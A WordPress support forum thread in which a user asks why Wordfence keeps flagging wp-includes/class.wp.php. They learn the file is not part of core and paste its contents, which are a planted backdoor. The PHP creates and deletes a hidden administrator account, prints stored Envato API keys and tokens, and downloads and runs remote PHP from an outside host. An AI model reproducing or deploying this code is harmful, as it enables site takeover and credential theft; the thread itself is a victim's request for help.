Support » Plugin: Wordfence Security - Firewall & Malware Scan » Why keep Waring: Unknown file in WordPress core: wp-includes/class.wp.php

  • Resolved topsan123

    (@topsan123)


    I use WordPress version 4.8.2. The scan keeps warning of

    Unknown file in WordPress core: wp-includes/class.wp.php
    Filename:	wp-includes/class.wp.php
    File Type:	Core
    Issue First Detected:	55 secs ago.
    Severity:	Warning
    Status	New
    This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.

    even though I have download version 4.8.2 and copied the file class.wp.php in the wp-includes folder to replace the one in my wp-includes folder. After that I started a new scan again. But why does the scan still keep warning of this file? And I didn’t see any strange code in the file. In the last scan I also marked as “I have fixed this issue” but it still keeps waring in the next scan.

    • This topic was modified 2 years, 9 months ago by topsan123.
Viewing 4 replies - 1 through 4 (of 4 total)
  • Hi,
    That’s because the file in “/wp-includes” directory is “class-wp.php” not “class.wp.php”, you can view the official WordPress repository on GitHub here, or check the copy you have downloaded from wordpress.org.

    Thanks.

    @wfalaa

    Ah…my mistake that I didn’t look carefully as it looks quite the same. Sorry and thanks for informing me. Actually, there’s no “class.wp.php” in “/wp-includes.” This file is one of the files that are used to hack my site now. I have removed all the files as shown in the result of the scan. Now I’ve just realized this file. That’s why the scan keeps warning me. This is what in the file:

    <?php 
    error_reporting(0);
    
    if( !isset($_GET['go']) )
    {
    
    require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
    $table_name = $wpdb->get_blog_prefix();
    $sample = 'a:1:{s:13:"administrator";b:1;}';
    if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
    if( isset($_GET['awu']) ) {
    $wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('100010010', '100010010', '\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011-06-07 00:00:00', '', '0', '100010010');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }
    if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 100010010");
    $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 100010010");}
    if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key'])) . '<br>';
      echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; }
      
      }
      
      if( isset($_GET['go']) )
    {
    
    if ( ! function_exists( 'wp_temp_setupx' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    
    if($tmpcontentx = @file_get_contents("http://www.dolsh.cc/codexc.txt"))
    {
    
    function wp_temp_setupx($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }
    
    extract(wp_temp_setupx($tmpcontentx));
    }
    }
    
      }
      
    ?>

    Hello, I also have this file. Should I delete it??

    @greg007 please check my reply to a similar thread here.

    Thanks.

    P.S. in the future, please consider opening a new support thread for any question you have, we will be glad to help.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Why keep Waring: Unknown file in WordPress core: wp-includes/class.wp.php’ is closed to new replies.